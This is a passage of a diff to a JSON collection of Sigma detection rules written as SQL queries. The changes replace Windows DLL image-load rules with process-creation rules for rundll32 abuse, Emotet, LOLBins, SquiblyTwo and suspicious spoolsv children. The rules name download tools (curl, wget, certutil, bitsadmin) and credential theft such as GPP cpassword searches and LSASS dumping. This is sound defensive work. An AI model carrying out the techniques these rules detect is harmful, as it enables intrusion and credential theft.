"image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" - ], - "filename": "image_load_side_load_office_dlls.yml" - }, - { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines 
ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", - "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": 
"Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "status": "test", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Use of Get-Command and 
Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event 
consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR 
(ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious 
OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + 